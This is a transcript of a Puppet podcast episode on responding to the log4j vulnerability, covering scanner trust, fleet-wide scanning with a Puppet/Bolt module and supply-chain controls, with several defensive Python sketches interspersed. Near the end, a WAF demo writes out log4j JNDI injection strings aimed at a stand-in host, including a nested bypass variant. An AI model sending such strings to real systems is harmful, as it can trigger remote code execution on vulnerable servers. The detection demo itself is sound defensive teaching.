Season 4 — Episode 5

The recent log4j fiasco reminded us that not only is it important to stay updated and current with security news, but it's also critical to have safe ways to deploy configuration updates or orchestrate reporting/remediation scripts across your infrastructure as quickly as possible. Jeremy and Nick join us today to share best practices and automation suggestions.

Looking for a better way to stay compliant and secure across your hybrid infrastructure with the power of policy as code? That's where Puppet Comply comes in.


Update: the GI Joe quote our hapless host massacred was "Now you know; and knowing is half the battle."


00:00:22 Ben Ford Hello, everybody, and welcome again to today's episode of the Pulling the Strings podcast, as always, powered by Puppet. My name is Ben Ford. I'm a developer advocate here at Puppet. I'm pretty active in the community as @binford2K. So today we're talking with Jeremy Mill and Nick Burgan about something that probably most of us have had to deal with, maybe in a more painful way than we really wanted to. I'm talking about the security incident that we had with log4j. I think there were four rapid succession incidents that just kept happening and it was like at the worst possible time, like they always are. So Jeremy is Puppet's sort of resident white hat hacker. He coordinated the response to this log4j vulnerability storm, and he's got lots of things to say about the best ways to respond to these security threats and incidents and, you know, just any other thing that comes up. So, Jeremy, do you have anything that you'd like to say about yourself or the things you're interested in here?

00:01:26 Jeremy Mill Yeah, sure. I've been in security for quite a while now. I sort of stumbled into it. I have a background, originally as a developer and as a systems administrator, and I worked a little bit doing signals intelligence when I was in the military before that. So, you know, one way or another, I've been a bit involved in cybersecurity for years now, and I've been really lucky to kind of end up where I have.

00:01:54 Ben Ford I saw that you had the Marines background listed, and I was really curious to know, like, what does that signal analysis sort of mean?

00:02:01 Jeremy Mill Yeah. So what that was, I was part of what's called a radio battalion. And we were, you know, small signals intelligence teams who would get attached to Marine infantry units or special operations units. And we would provide what's called indications and warnings to those groups that we are attached with, right? So we'd have people, you know, listening to the enemy and, you know, providing things like, Oh, they're over that way or they're watching us as we walk down this road. Maybe this isn't the road that we want to be on right now and things like that.

00:02:38 Ben Ford That's really fascinating. So it's like sort of sifting through all of the noise and picking out the things that are really relevant. It's almost like the SETI@home project, where we're trying to find the right kind of space objects or something.

00:02:53 Jeremy Mill Yeah, yeah, definitely. I mean, think about all of the different ways that people communicate electronically, you know, and obviously, I can't go into too much detail with any of that, right? But, you know, any of them could be a way that the enemy is communicating. So being able to, you know, listen to it and respond to it in real time or near real time is a pretty cool, pretty challenging field to be working in.

00:03:22 Ben Ford I bet that's fascinating. I bet it really helps kind of like sift out the signal from the noise when we get security vulnerability reports because like some of them are a big deal, some of them are not a big deal. It's like, I don't know how to tell the difference, but I know that you do.

00:03:35 Jeremy Mill Yeah, yeah, totally. I think the biggest thing is that attacker mindset, right? Even when you're working on, you know, the blue team, the defender's side of cybersecurity, knowing how to think like the attacker, right, because when you're doing signals intelligence, you basically are the attacker, is really valuable.

00:03:54 Ben Ford That's really cool. So moving on to Nick, he's an engineer on our Puppet Enterprise team, and this totally isn't his job at all, but once Google released their log4jscanner tool, he realized that it would fit really well as like a Bolt task or a fact, or fit into the Puppet infrastructure, and he kind of took it on himself to just build and publish that module. So do you want to tell a little bit about that story?

00:04:21 Nick Burgan Yeah, sure. So this all happens, you know, right at the end of the year, like you're saying, the worst possible time when most people are out on vacation, and those of us that were here were just, you know, chatting about it and, you know, working in our security channel on Slack, and Google released the scanner and someone, in fact, I think it might have been you, Ben, said, Wouldn't it be cool if we put this in a module? And I thought, Yeah, yeah, it would. So I just spent a couple of days and just threw something together and started with a task to run this program that Google made, log4jscanner. And it's a really nice tool. It just, you know, it will scan all the directories that you give it and drill down into JAR files and see if any of them are vulnerable and spit out the ones that are. And so it lends itself really well to, you know, running as a task. You can just run the binary across all your infrastructure and get a nice, centralized list of all the vulnerabilities that you have. So yeah, it was a fun little project.

00:05:43 Ben Ford Well, I happen to be lucky enough to live real close to Nick here. And we're doing a backyard kind of miniature communal beer festival this weekend. So I'm pretty excited to see what Nick brings to share. Do you have like any teasers, any hints you can give to get me a little excited there?

00:06:04 Nick Burgan Yeah, one of the standbys here in Portland is Deschutes, so I've got an old Abyss that I'm going to bring. And then Southern Oregon Brewing is a company that unfortunately went out of business several years ago, and I still have one of their old porters, so I'm looking forward to cracking that open.

00:06:22 Ben Ford I'm really excited about that. Yeah, the Abyss has never really been one of my all time favorites, but it's crazy watching people line up for it every year when it's released. I swear they have like seven bottles, and everybody in Portland just lines up to be like one of the lucky few who could get one of these bottles.

00:06:41 Nick Burgan Yeah, it's definitely a thing. And a few years ago, I did a 10-year-vertical of Abyss where we had one bottle from the last ten years and they were all very different. It was kind of interesting.

00:06:52 Ben Ford That sounds really fun. Well, how about if we kind of move on? And Jeremy, I think you're probably the one who knows the most about like how this thing played out and like how, what happened, and how it turned into the giant storm that it became. So could you tell us a story about the log4j vulnerability and what our response was to it?

00:07:15 Jeremy Mill Yeah, this was sort of the very classic tale of a disastrous zero day being dropped on Twitter, which is sort of everyone's worst fear, right? Which is why this got the response that it did. I was fortunate to be doomscrolling on Twitter at like 9 p.m. when I actually saw the initial vulnerability report and it came out of Alibaba's research team, which was pretty cool to get, right. It wasn't one of the traditional, you know, names that we hear of releasing research, but also maybe part of the reason why it got dropped in the way that it did before anybody had a chance to patch anything. So I kind of started our response, you know, late that Thursday night, realized that I wasn't going to complete it by any stretch of the imagination. So I figured I'd get some sleep and, you know, start really hitting it the next, the next day. But then after that, I mean, it really just sort of it exploded, right? It became, you know, as everybody started to come online, especially through the U.S., and people started to really realize the width and breadth of how widely deployed this library actually is. It just, you know, it sort of it just it took on a life of its own.

00:08:43 Ben Ford Yeah, I heard that Minecraft was actually one of the first ones hit, one of the first things that hit big.

00:08:50 Jeremy Mill So Minecraft is actually the reason why this functionality got added.

00:08:55 Ben Ford Oh, you're kidding.

00:08:56 Jeremy Mill Yeah. So my understanding is that it was a, you know, a feature request or a pull request from some Minecraft developers because they were basically like, Oh, well, log4j has this ability to do, you know, JNDI lookups and wouldn't it be cool if we could just put some commands in the chat and we could, we could run them, right? But that's also just how remote code execution works. And that's, you know, that's the genesis of how all this went down. And that's the reason why, you know, the continuing conversations around this vulnerability are, how do we manage this open source ecosystem that drives so much of our, you know, critical and enterprise systems?

00:09:42 Ben Ford That's crazy. When did you know that it was such a big deal? Because I remember when I read about it, I was like, Oh, wow, this is going to be big. And like, the next day I looked at it and I was like, Oh, no, it's like, really big. And it was like every single day there was another realization of just how much bigger it was than I realized.

00:09:59 Jeremy Mill I think, I can't remember who it was, but somebody pretty quickly went and said, Oh, I'm just going to scrape Maven's package repository, right, and take a look for how many vulnerable versions there are out there. And you know, somebody did that pretty quickly and shared the results of it, and it was just a staggering, staggering number of vulnerable libraries. And it was just clear that like that, plus the ease of exploitation, right? You know, just being able to log this malicious string and cause RCE was just out of this world. It's like, Oh, this is not good.

00:10:38 Ben Ford Wow. So how do you like like if you see a vulnerability like that go around, like, how do you know if you're affected? How do you know if that's something that you have to jump on and respond to right away?

00:10:50 Jeremy Mill Yeah, that's a super awesome question, and I think you can look at it from two perspectives, and I'm lucky enough to, you know, being in product security, to wear both of these hats a little bit, you know, from like the AppSec perspective and the, you know, developer of a product perspective. You know, in the ideal situation for absolutely all of your software that you produce, you've got a full bill of materials. And, you know, because you're running a software composition analysis tool, you know, like WhiteSource or Snyk or one of those, right? And you could very quickly go, is this a first party dependency that I'm bringing in? Is it a transitive dependency, right? A dependency of something else that I'm bringing in, right? And you should be able to respond to it really quickly. And in the situations where you don't, have the ability to very quickly search your code base, right? And also, it's a good way to verify your SCA tool as well, you know, to get a good understanding of what's affected and then what the value of those things are that are affected. Right. So knowing what your crown jewels are, what your most critical assets are, really helps you do that.
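
To make the first-party versus transitive distinction concrete, here is a minimal Python sketch. It assumes the bill of materials has already been exported as a plain mapping of package name to direct dependencies. The package names and the `SBOM` structure are hypothetical, and real SCA tools such as the ones mentioned above use their own formats and do far more than this.

```python
from collections import deque


def find_dependency_paths(graph, root, target):
    """Return every dependency path from root that ends at target (breadth-first)."""
    paths = []
    queue = deque([[root]])
    while queue:
        path = queue.popleft()
        for dep in graph.get(path[-1], []):
            if dep in path:  # skip cycles so the walk always terminates
                continue
            new_path = path + [dep]
            if dep == target:
                paths.append(new_path)
            else:
                queue.append(new_path)
    return paths


def classify(paths):
    """Split paths into direct (root -> target) and transitive (anything longer)."""
    return {
        "direct": [p for p in paths if len(p) == 2],
        "transitive": [p for p in paths if len(p) > 2],
    }


# Hypothetical bill of materials: package -> packages it depends on directly.
SBOM = {
    "my-app": ["web-framework", "log4j-core"],
    "web-framework": ["json-lib", "log4j-core"],
    "json-lib": [],
}

result = classify(find_dependency_paths(SBOM, "my-app", "log4j-core"))
print(result)
```

Each transitive path names the intermediate package that pulls the library in, which is usually the upstream you need to patch or chase.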

00:12:03 Ben Ford Yeah, that value part, that's huge.

00:12:06 Jeremy Mill Yeah, yeah, exactly. And that's a missing piece from a lot of places, which is unfortunate. And then the other side, right, is the sysadmin piece. And I think that's what like this module that we released really helps with because you might install, you do right, it's guaranteed you install software on your system that you don't fully understand.

00:12:29 Ben Ford Sometimes you don't even know that you install it.

00:12:31 Jeremy Mill Exactly, right. And yeah, it's installed by something else you installed or it came down through an update or, you know, any number of ways. And that's what was a lot harder to answer through this.

00:12:42 Ben Ford That's kind of a fascinating point. You brought up Snyk and like analyzing your dependencies and everything. One of the things that seemed like it made this particular vulnerability really, really hard is just kind of the way that Java dependencies are packed inside the JAR file like the package distribution, but not necessarily like something that you could see externally. Like if it were like a system library, you'd just query the RPM database or something, but JAR files, they could contain anything. And if the thing you're looking at isn't an open source tool that you could just like, crawl back and look at all the repositories everywhere, then you're into the point of like, how do you analyze every single thing on your system? And it's something that I always see whenever there is a vulnerability is like there's little snippets of shell code or there's like, here's a little like Perl script that I wrote that's going to tell you if you're vulnerable and everything, how do you know when you can trust those things? And why did we wait until Google released the scanner instead of using any of the other things to build out our module? I suppose that's for both of you to have input into.

00:14:02 Jeremy Mill Yeah, I think it's a great question because in one way, right, this is harder to detect because it was, you know, part of a JAR, right, and JARs can be nested in all sorts of things like that. But JAR files are ZIP files and, you know, we can, you know, recursively search relatively easily. It's possible to imagine an even worse scenario, which is some very popular but always statically linked library is all of a sudden vulnerable, maybe something built with Go or, you know, built with Rust, right? And with a similar, you know, probably wouldn't be as widely deployed, but could still be bad.
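
Because JAR files are ZIP archives, the recursive search Jeremy describes can be sketched with Python's standard `zipfile` module. This is a minimal illustration, not how Google's log4jscanner works. It only reports archives that bundle the `JndiLookup` class, which shows that log4j-core is present but not whether that copy is a vulnerable version. The helper names and the in-memory demo archive are made up for the example.

```python
import io
import zipfile

# Class file that ships inside log4j-core; its presence means the library is bundled.
MARKER = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def find_marker(data, label):
    """Yield an 'outer!inner' path for every (nested) archive that contains MARKER."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a ZIP archive after all, nothing to report
    with archive:
        for name in archive.namelist():
            if name == MARKER:
                yield label
            elif name.lower().endswith(ARCHIVE_SUFFIXES):
                # Recurse into archives packed inside this archive.
                yield from find_marker(archive.read(name), f"{label}!{name}")


def make_zip(files):
    """Build an in-memory ZIP from {name: bytes}; only used for the demo below."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buffer.getvalue()


# Demo: a fake WAR that carries a fake log4j-core JAR one level down.
inner = make_zip({MARKER: b"placeholder"})
outer = make_zip({"lib/log4j-core.jar": inner, "README.txt": b"hello"})
hits = list(find_marker(outer, "app.war"))
print(hits)
```

A statically linked Go or Rust binary offers no such container to walk, which is why the scenario Jeremy raises next would be harder to detect.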

00:14:44 Ben Ford Something that you'd have to decompile?

00:14:46 Jeremy Mill Right, exactly right. Or even worse, the detection rate has a really high false positive rate, which makes it harder to definitively go back to a vendor and say, like, no, you are vulnerable, we need you to patch this.

00:15:01 Ben Ford Some years ago, I remember, what was it, Shellshock, that was also really huge. This one might have been bigger, but I did a module kind of similar, using MCollective and a fact. And it was literally just a bunch of shell snippets that I found in different places across the internet that were like, if you run this thing and it segfaults, then your version of Bash is vulnerable. And I put it all into a fact. To be honest, I think that was a little bit risky because I didn't completely know what each one of those snippets of shell code was doing.

00:15:47 Jeremy Mill Yeah, no, that's an awesome point. And I think, you know, one of the reasons that we waited was that some of the very first scanners, if we want to call them that, that came out for this were really more of like red team tools, right? They attempted to just exploit the issue, right? And you know, some of them included, you know, like base64 encoded JNDI payloads, and they were like, trust us, it's fine, right? But you know, they might not have been. I try to stay away, you know, in like a personal philosophy kind of way, from scanners that boil down to, well, let's try and exploit it and see if we get back a valid result. You know, sometimes that's your only option. But there's lots of undefined behavior as soon as you start getting into the world of launching exploits, whether they're supposed to be benign or not.

00:16:41 Ben Ford Yeah, it kind of sounds like you're saying that it mostly boils down to a matter of trust. You know that it was the fact that we could look at who built this log4jscanner tool, and we had a high level of trust with them.

00:16:56 Jeremy Mill Yes, certainly for me, for sure. You know, also the trust in the stability of the tool, right? I trust that if Google's releasing it and it's something that they're running across their infrastructure, they've done some of their due diligence to at least make sure that they're, you know, doing no harm, you know, if we're going to steal that from doctors. And that's a huge confidence boost, you know, versus maybe some random, you know, repository. I might trust that to run locally. You know, in a container or, you know, maybe on my machine if I'm desperate. But as soon as you click that deploy all button and you push it out to everything, that's a different level of trust you have to have.

00:17:38 Nick Burgan It helps that the entire tool is open source that you can go in and see exactly what it's doing. And, you know, with our module, too, you can build the binary yourself if you want to have an extra level of confidence that it's, you know, doing what you think it's doing.

00:17:55 Ben Ford It being written in a way that lets you like, actually read the code and understand what it's doing.

00:18:00 Nick Burgan Yeah, for sure.

00:18:02 Ben Ford That was super useful. So how do people normally manage these scans or updates or whatnot when their infrastructure might be thousands of machines? Like how do they even know where to deploy fixes to? I know that like even this log4jscanner tool that Google released, it was written to work on a local machine, like you'd be on the machine that you were testing and it would tell you if it was vulnerable or not. But that doesn't scale out to infrastructures.

00:18:33 Nick Burgan Yeah, that can be a challenging problem, and everyone has many different ways that they put together to accomplish things like that. You know, just at a base level, you know, you can SCP the binary to all of your nodes and use SSH to run it on the nodes and collect all that data and read it all yourself. And that's, you know, that's really cumbersome. Something like Puppet makes it really easy. You know, you have a window into all of your nodes in your infrastructure, and you have this avenue for collecting whatever data you want. So you can write a fact like you were saying to collect that data or in the case of this module, you can really easily, you know, just write this module that contains the binary and some code around it and just go run it on your thousands of nodes and collect all the data in a very centralized place that can really help you to get a good understanding of where your infrastructure is at and what's vulnerable and what isn't.

00:19:31 Jeremy Mill Yeah, I've been, you know, on the writing side of some of those very janky SSH to all of my nodes in an organization type scripts, you know, in situations where I wish I had a tool like Puppet or like this module that would have made that response so much easier. And yeah, it is a nightmare. And you know, sometimes you end up running it nine times because you found edge cases as you were running it. It's a terrible, terrible place to be. Preparation is key.

00:20:00 Ben Ford I have definitely been on that end, where I run a job and it's like it's going to take four hours to complete and it's like 87 percent done. And I'm like, Oh crap, OK, well, I guess I got another four hours ahead of me. So if you already are running Puppet, that's really useful. It's easy to just classify your machines and distribute whatever is needed from this module, but what about people who aren't running Puppet yet? Is that something that the Bolt task helps out with?

00:20:31 Nick Burgan Yeah. So Bolt is kind of like, you know, your next step up from, you know, writing a bash script and SSHing into all your nodes, right? So Bolt will make it really easy so you can write a task that does what you want for each of your nodes and then go out and run that at scale and collect all that data back in a centralized way. So in fact, when I was developing this module in the first place, the first thing I started with was just a very simple task, right. So all it does is download the binary from the primary server, run it, and spit the results back. And the nice thing about this log4jscanner tool is that it's very simple. It just prints out, on each line, each vulnerable JAR file that it finds, including ones inside other JAR files. So, you know, just as a base level, and probably for most people that works really well, you know, you just want to run this tool and see the results. And you know, if everything's blank, then you're good and then you can take it to the next level if you want, you know, if you want to get fancier with it and you want to actually monitor your infrastructure continuously where you know, maybe someone later on down the line installs a new package that hasn't been updated with the new log4j version and is still vulnerable. You can continuously monitor your infrastructure for introduction of these vulnerabilities. And that's where you can, you know, kind of get more of the Puppet code and the module to actually generate facts for you. And you know, that's kind of another level on top of that.
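
The "one vulnerable JAR per line, blank means you're good" output Nick describes is easy to roll up centrally. The Python sketch below assumes an orchestrator has already handed back each node's raw stdout as a string. The node names, paths, and the report layout are hypothetical, and this is not the module's actual task code.

```python
import json


def parse_scanner_output(stdout):
    """Turn raw scanner output (one finding per line) into a list of paths."""
    return [line.strip() for line in stdout.splitlines() if line.strip()]


def summarize(stdout_by_node):
    """Build a central report: which nodes have findings, and what they are."""
    findings = {node: parse_scanner_output(out) for node, out in stdout_by_node.items()}
    vulnerable = {node: paths for node, paths in findings.items() if paths}
    return {
        "nodes_scanned": len(findings),
        "nodes_vulnerable": len(vulnerable),
        "findings": vulnerable,
    }


# Hypothetical raw output, as if collected from three nodes by an orchestrator.
raw_results = {
    "web01.example.com": "/opt/app/lib/log4j-core-2.14.1.jar\n",
    "web02.example.com": "",  # blank output: nothing found on this node
    "db01.example.com": "/srv/tool.war\n/srv/other/app.jar\n",
}

report = summarize(raw_results)
print(json.dumps(report, indent=2))
```

Keeping the per-node parsing separate from the roll-up means the same summary works whether the output arrived through a task run or a periodically refreshed fact.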

00:21:59 Ben Ford Yeah, that's pretty cool. And to be clear, it's like Bolt isn't the only thing that can orchestrate running tools like this. There are other products out there that do it. I think it's really important that people know that there are ways that you can, that you don't have to sit down and start by writing a shell script to SSH in a for loop across all of your infrastructure.

00:22:22 Nick Burgan Yeah, absolutely. You got to, you know, pick the tool that you're most comfortable with that you can, you know, rapidly develop these kinds of things, especially when you're in these kind of crunch times where there's a very serious vulnerability that you need to figure out if you're exposed to.

00:22:37 Ben Ford One of the things that I like about Puppet and Bolt module, though, is that it's sitting up there on the Forge and you can just install it and use it. You don't have to build it and develop it for yourself. And because it's built by somebody, that going back to the idea of trust, is built by somebody that we hope you trust, us, and other community members are also running the same thing. You're running something that you have a higher level of confidence in when you have other community members that are also running the same thing. So it's kind of like the distribution of such a tool that I think really adds to the value of it.

00:23:13 Nick Burgan It's kind of crowdsourcing this work, right? There's no need to reinvent the wheel 20 times. You know, if someone creates something that does exactly what you need, great, you know, it reduces your response time. So it's very helpful.

00:23:27 Jeremy Mill One thing I would like to add real quick though, I would advocate for people to try doing something like this before an incident happens, right? The time that you want to figure out the gotchas with any of these tools, right, no matter what tool you're using, is not during an active incident. Right. So, practice like you play and do that tabletop exercise. Run something, right. Get whoami back from all your machines. You know what I mean? Something that you can replace later. But try something before an incident.

00:24:06 Ben Ford That's a really good point, actually. And it really kind of supports the idea that we should be using an orchestration tool rather than writing a shell script that will call the raw tool that Google published because that thing didn't exist four weeks ago, or however long, I guess it's been a couple more weeks than that. So it's brand new. And if you're trying to figure out how to use it and what its limitations are and how to invoke it and what you can trust, etcetera, in that active incident, like you're saying, you're bound to make more mistakes or have higher stress levels or whatnot. But if you have a tool that you're already used to running and you can just say, Hey, we have a scanner, we trust it, Google built it, and this thing is going to orchestrate it for us and we already know how to do that. Go make it happen. Give me a report back. That's a lot less that you have to, like a lot less cognitive load you have to take on right away.

00:25:05 Jeremy Mill Yeah. And also, I, you know, thinking about who's running it in that situation, right, to that sort of organizational risk, the person who does it on a regular basis might not be there when the event is happening or, you know, it may be a different team who's taking the lead on it and making sure that that institutional knowledge is shared and supported and, you know, resistant to single points of failure will make a world of difference.

00:25:33 Ben Ford I like that a lot.

00:25:34 Nick Burgan Yeah. And having something like the log4jscanner module, if you look at the code and by the way, it's completely open source, you can go look at it on our GitHub. It's actually a pretty good framework for just running whatever binary you want and collecting the results back in a centralized way. So if you have this framework in place before these things happen, you know you can take the specific tool that is scanning for the specific vulnerability and just, you know, copy this module and add your binary in there and you've already got something ready to go.

00:26:05 Ben Ford That's a really cool idea. Now, you sort of mentioned this the other day, the idea of maybe like making that a little bit more generalizable framework, so it wasn't tied just to log4j, but it could be extended for other scanners to detect other things. Do you have any thoughts or plans on extending that? Or is that just a hey, this is a thing that could happen?

00:26:29 Nick Burgan Yeah, for sure. I think it would be a really useful kind of module to make. So, you know, there are, of course, some log4jscanner specific things in this module, for instance, the flags that you pass the binary and some of the parameters in the class for setting up the continuous scanning. But by and large, it's pretty generic. So I think it would be great to take this module and, you know, go the next step and make it more generic so that you can run anything and pass whatever flags you need into the binary. Yeah, have it ready to go for the next thing that you need to scan your whole infrastructure for.

00:27:07 Ben Ford Almost sounds like a template for security response.

00:27:10 Nick Burgan Yeah, definitely.

00:27:11 Jeremy Mill This actually just came to my mind, but it would almost be really cool if you know you could use things like, you know, YARA rules or things like that. You know, if you had a specific piece of malware, right? Even if you're maybe searching for things like that, right, it could be really pretty extensible and useful for a wide variety of security incidents.

00:27:32 Nick Burgan Yeah, for sure.

00:27:33 Ben Ford That's a really neat idea. I know that when we did the malware scanning on the Forge, one of the things that we can do with VirusTotal is define our own custom YARA rules to detect things that maybe the big scanners don't. And that could be really helpful, being that Puppet modules aren't necessarily the same kind of things as Windows exes, for example. So that was something that we did consider and we may end up doing sometime in the future. We kind of really covered a lot of this just in organic conversation, but what sort of challenges did you have writing this thing? Were there any things that were particularly difficult that we haven't already talked about?

00:28:19 Nick Burgan Yeah. So when I was writing this module, you know, Google hadn't actually published any compiled binaries yet, so we had to compile it ourselves, which is not hard at all. It's a pretty simple Go app, but you know, you also want to make sure that, you know, this binary that we are distributing is trusted, right? So there is some checking in the module just to make sure that, you know, the binary that you're sending out is the one that we packaged with the module. And also in the README, there are instructions on exactly how we built it and what commit we built it from in Google's log4jscanner repo, so that there's traceability. So I suppose that's one challenge. Another is just kind of creating the framework for that kind of next layer where you have the continuous monitoring for your infrastructure, not just running the task, but actually, you know, kind of running this app on a regular basis and collecting that data in a fact. In this case, it actually was not too hard because we have another module that does something similar called pe_patch, which is based off the OS patching module by Tony Greene. So we're able to, you know, kind of take a lot of that code and pare it down and apply it here. But, you know, if we hadn't had that, it would be a bit more work to kind of put all that machinery in place.
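
Nick doesn't say how the module checks the binary, so the following is only one common approach, shown as a hedged Python sketch: compare the SHA-256 digest of the file you are about to distribute against a digest recorded at build time. The function names and the temporary stand-in file are hypothetical.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_of(path, chunk_size=65536):
    """Hash a file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_binary(path, expected_sha256):
    """Return True only if the file's digest matches the recorded one."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())


# Demo with a throwaway file standing in for the packaged scanner binary.
payload = b"pretend this is the scanner binary"
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(payload)
    binary_path = tmp.name

recorded = hashlib.sha256(payload).hexdigest()  # would come from the build record
matches = verify_binary(binary_path, recorded)
tampered = verify_binary(binary_path, "0" * 64)
os.remove(binary_path)
print(matches, tampered)
```

A digest check like this only proves the file is the one that was packaged. Tying it back to a specific upstream commit still depends on documented, repeatable build steps like the ones Nick mentions.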

00:29:49 Jeremy Mill I was going to say I'm really glad that you brought up, you know, the importance of reproducible builds. Security people love reproducible builds and I think everybody should, you know, so regardless of whatever software that you might be writing, right? That's it. It's really nice to be able to provide that as a feature to your users.

00:30:10 Ben Ford That's exactly the same thing I was going to ask about, just to clarify that we were talking about like how you trust, not only do you trust the thing from Google, but you trust that we are not sneaking something in nefariously in between, and being able to go back and validate that this matches that build that I pulled from that repo. Maybe this is a question for Jeremy, I think, as the security expert here, having the experience in responding to these things long term. One of the things that this module does is it monitors, like periodically runs the scan, like Nick was saying, and reports back. But that scan itself, it's not a lightweight thing. So I assume that at some point we can say, Hey, we're done with this incident. We no longer need to run this scan and check this thing. How do you make that determination? How do you decide when to pull this back?

00:31:08 Jeremy Mill That's a really good question, and I don't know that there is an easy answer. You know, at the last check, Google actually ran numbers again against Maven. And, you know, a fairly non-trivial percentage of, you know, packages that had log4j in them still have the vulnerable version. So I guess a lot of that would depend on what your change control processes are, right? If you're not confident that somebody in your organization isn't going to pull in untrusted packages or install untrusted software or software that hasn't been checked, you know, as part of some other continuous process, right, then, you know, then it's going to have a lot longer of a tail for you to run this. But if you do have good change control procedures and you do have a high degree of confidence in, you know, who is installing things on your systems and in the processes that check those things that they're installing, you know, it could be a much shorter window, right? There are orgs out there that probably have stopped running this already. And others who, you know, might be looking at doing this for, you know, a full calendar year or longer.

00:32:30 Ben Ford How annoying must it be to do like a complete audit and like clean all of your infrastructure of this thing. And then for it to just kind of sneak back in as like a transitive dependency three months later?

00:32:41 Jeremy Mill Regressions happen all the time, and certainly, no one here is amazed by that. But that's, you know, that's just a fact of life. And I don't have the answer. I've been responsible for regressions by accident before, you know, so it's a hard problem. And it's about building resilient processes, because that's really your best defense.

00:33:07 Nick Burgan And I think that's why you need to have some sort of continuous monitoring of your infrastructure to make sure that these things aren't slipping back in, that you have some way to detect when they slip back in, and you have something in place to make sure that doesn't happen.

00:33:22 Ben Ford Something that you said, Jeremy, kind of sparked a thought, and this is sort of half formed. I don't really have a complete question, but I think you'll probably get the gist of what I'm saying here, which is the idea of taking this scanner and then pulling it back because you have some kind of validation built into your change control, so you know what software is being deployed and where, etcetera. When you have something like Puppet or Ansible, you know, things that deploy software into your infrastructure, that configuration always goes through your CI pipeline. But the software that it actually pulls down and installs doesn't necessarily. Depending on how you have your own policy set up, you might be pulling directly from an install source or a repository on the internet rather than through your own pipelines. So do you have suggestions, maybe on processes or tools, or maybe this is something that can help with tracking down those transitive dependencies?

00:34:31 Jeremy Mill Yeah. So you know, there's a decent number of ways to control for things like that, you know, but this is at the heart of the supply chain attack scenario, which is even if there's something that was previously trusted, right? It can become malicious. Whether that's, you know, we have lots of examples of npm packages recently becoming malicious or being typosquatted, right? So when a name gets mistyped by someone, you know, they accidentally pull in the malicious one. You know, one solution might be that, you know, before we actually deploy this change to prod, you know, we deploy to a staging environment, and that's where we can run our log4jscanner, right? Make sure that this image, this set of what we're pulling in right now, is clean according to what our rules are, right? And we take that performance hit there because it's not carrying a production workload. And then we can promote it to being our production system, things like that.
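
The staging gate Jeremy describes can be sketched roughly as follows. This is a minimal illustration, not the Puppet module's implementation: `evaluate_staging` and `fake_scan` are hypothetical names, and the scanner is passed in as a plain callable that returns the paths it flags, so no particular command-line interface is assumed.

```python
from typing import Callable, Dict, Iterable, List, Tuple


def evaluate_staging(
    scan: Callable[[str], Iterable[str]],
    roots: Iterable[str],
) -> Tuple[bool, Dict[str, List[str]]]:
    """Run a scanner over each staging root and decide whether to promote.

    `scan` is any callable that takes a directory and returns the paths it
    considers vulnerable (an assumption made for this sketch).
    """
    findings: Dict[str, List[str]] = {}
    for root in roots:
        hits = sorted(set(scan(root)))
        if hits:
            findings[root] = hits
    # Promote only when no root produced a finding.
    return (not findings, findings)


def fake_scan(root: str) -> List[str]:
    """Stand-in scanner with made-up results, for illustration only."""
    known_bad = {"/opt/app": ["/opt/app/lib/log4j-core-2.14.1.jar"]}
    return known_bad.get(root, [])


if __name__ == "__main__":
    ok, findings = evaluate_staging(fake_scan, ["/opt/app", "/opt/clean"])
    print("promote" if ok else "hold", findings)
```

Because the expensive scan runs against staging, the production systems only ever receive a set of artifacts that already passed the check.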

00:35:36 Ben Ford Yeah, those are great suggestions. And honestly, that's not limited to just security issues, either. It's like, this is how you validate that you get good changes, that trusted changes go out into your infrastructure. That was something that I had intended to ask, and I think I kind of skipped over it and zoomed on to get to some of the more juicy tech details here. But one thing that I remember you saying, and I don't remember the exact words, but one thing that I remember having a conversation about early in this vulnerability response is to, like, slow down and look at it more methodically and not rush something out before we were certain what the impacts were going to be. So what's the narrative around that? Do you have suggestions about how people can do that at the appropriate speed, like respond as quickly as possible, but also without breaking things in the meantime?

00:36:34 Jeremy Mill Yeah, I think one of the things that's, you know, I think a lot, if not most orgs, probably do this right. But you know, we said before, like first do no harm, right? And I think that's important, right, to get it right. But, you know, stop and actually, to the extent that you can, figure out what is vulnerable and in what ways, so you can accurately assess the risk that you're facing, because that's going to drive a lot of your decisions. And also being prepared to put mitigations in place, right? So these are things that aren't fixes, they're WAF rules. You know, nobody can block, you know, log4j exploitation with a WAF, right? There's six million bypasses. But you know, in that first day, two days where almost all of the exploits that people were seeing all looked the exact same, you could have a pretty high degree of confidence that you weren't going to get exploited by this, so that you could, you know, buy yourself that window to make sure the fix that you're putting out is the right one and that you're actually fixing the issue to the greatest extent possible.
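
To make the "mitigation, not a fix" point concrete, here is a small sketch of why a pattern-matching rule only buys time. The rule below is a hypothetical, deliberately naive regular expression, not a rule from any real WAF product; it catches the literal lookup prefix but misses a nested-lookup variant of the same string.

```python
import re

# Hypothetical, deliberately naive rule: match the literal "${jndi:" prefix.
NAIVE_RULE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def blocked(value: str) -> bool:
    """Return True when the naive rule would flag this input."""
    return bool(NAIVE_RULE.search(value))


if __name__ == "__main__":
    plain = "${jndi:ldap://example.invalid/a}"
    nested = "${${lower:j}ndi:ldap://example.invalid/a}"
    print(blocked(plain))   # flagged: contains the literal prefix
    print(blocked(nested))  # not flagged: the prefix never appears literally
```

A rule like this is useful while the traffic being seen all looks the same, but it does not replace patching the vulnerable library.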

00:37:57 Ben Ford All right. So we're kind of getting closer to the end here. So do either of you have advice for people mitigating things like this in the future? I know this is not going to be the last one that we see. We've already seen another several in the meantime. So how do people respond effectively? Are there suggestions that we haven't already talked about?

00:38:20 Nick Burgan I think just, you know, having something in place to be able to monitor your infrastructure that you know, a framework where you can actually have observability into what's on all of your nodes and be able to run a scanner or whatever to be able to detect issues, new issues that come up. So, you know, having your infrastructure in place to be able to do that.

